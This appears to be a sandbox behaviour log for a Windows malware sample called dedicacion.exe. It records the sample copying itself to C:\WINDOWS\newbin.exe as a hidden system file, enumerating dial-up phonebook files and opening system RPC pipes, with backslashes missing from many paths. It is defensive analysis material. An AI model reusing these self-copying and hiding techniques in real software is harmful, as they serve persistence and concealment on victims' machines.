 newbin.exe
 .Ip
 C:WINDOWSnewbin.exe.config
 C:WINDOWSnewbin.exe
 .PIPEEVENTLOG
 .PIPEROUTER
 .PIPElsarpc
 c:autoexec.bat
 .PIPElsarpc
 .pipePIPE_EVENTROOT/CIMV2PROVIDERSUBSYSTEM
 C:WINDOWSRegistrationR000000000007.clb
 C:WINDOWSREPAIRSETUP.LOG
 .PIPEwkssvc
 .PIPEsrvsvc
 Deleted Files 
 Chronological Order  Create/Open File: c:\dedicacion.exe (OPEN_ALWAYS)
 Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
 Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
 Create/Open File: DeviceTcp (OPEN_ALWAYS)
 Create/Open File: DeviceIp (OPEN_ALWAYS)
 Create/Open File: DeviceIp (OPEN_ALWAYS)
 Open File: .Ip (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSsystem32mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
 Open File: c:dedicacion.exe.config (OPEN_EXISTING)
 Open File: c:dedicacion.exe (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727 Flags: (SECURITY_ANONYMOUS)
 Find File: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727mscorwks.dll
 Create/Open File: DeviceGpc (OPEN_ALWAYS)
 Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
 Open File: .PIPEEVENTLOG (OPEN_EXISTING)
 Open File: .PIPEROUTER (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSnewbin.exe Flags: (SECURITY_ANONYMOUS)
 Copy File: c:\dedicacion.exe to C:\WINDOWS\newbin.exe
 Set File Attributes: C:\WINDOWS\newbin.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
 Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
 Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
 Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
 Open File: C:WINDOWSsystem32 ()
 Find File: C:WINDOWSsystem32netsh.exe
 Open File: C:WINDOWS ()
 Find File: C:WINDOWSnewbin.exe
 Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
 Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSsystem32WBEMLogs Flags: (SECURITY_ANONYMOUS)
 Open File: .PIPElsarpc (OPEN_EXISTING)
 Open File: newbin.exe (OPEN_EXISTING)
 Create/Open File: C:\WINDOWS\newbin.exe (OPEN_ALWAYS)
 Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
 Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
 Create/Open File: DeviceTcp (OPEN_ALWAYS)
 Create/Open File: DeviceIp (OPEN_ALWAYS)
 Create/Open File: DeviceIp (OPEN_ALWAYS)
 Open File: .Ip (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSsystem32mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
 Open File: C:WINDOWSnewbin.exe.config (OPEN_EXISTING)
 Open File: C:WINDOWSnewbin.exe (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727 Flags: (SECURITY_ANONYMOUS)
 Find File: C:WINDOWSMicrosoft.NETFrameworkv2.0.50727mscorwks.dll
 Create/Open File: DeviceGpc (OPEN_ALWAYS)
 Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
 Open File: .PIPEEVENTLOG (OPEN_EXISTING)
 Open File: .PIPEROUTER (OPEN_EXISTING)
 Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
 Open File: .PIPElsarpc (OPEN_EXISTING)
 Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
 Open File: c:autoexec.bat (OPEN_EXISTING)
 Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
 Find File: C:WINDOWSsystem32Ras*.pbk
 Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
 Open File: .PIPElsarpc (OPEN_EXISTING)
 Open File: .pipePIPE_EVENTROOT/CIMV2PROVIDERSUBSYSTEM (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
 Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
 Get File Attributes: C:WINDOWSsystem32WBEMLogs Flags: (SECURITY_ANONYMOUS)
 Get File Attributes: C:WINDOWS Flags: (SECURITY_ANONYMOUS)
 Open File: C:WINDOWSREPAIRSETUP.LOG ()
 Open File: .PIPEwkssvc (OPEN_EXISTING)
 Open File: .PIPEsrvsvc (OPEN_EXISTING)